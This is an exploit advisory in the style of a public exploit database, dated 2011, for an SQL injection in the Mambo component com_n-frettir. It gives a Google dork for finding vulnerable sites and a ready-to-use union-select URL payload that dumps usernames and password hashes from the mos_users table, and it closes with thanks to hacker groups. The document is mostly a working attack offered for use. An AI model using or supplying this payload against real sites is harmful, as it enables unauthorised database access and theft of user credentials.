------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-frettir SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-frettir
# Date: 01/09/2011
# Author: CoBRa_21   (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com   
# Software Link: http://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------

Exploit

http://localhost/[PATH]/index.php?option=com_n-frettir&do=view&Itemid=81&id=-54 union select 0,username,2,password,4,5,6,7,8,9,10 from mos_users

------------------------------------------------------------------------------------------------------

Thanks E-Banka.Org & Cyber-Warrior.Org

------------------------------------------------------------------------------------------------------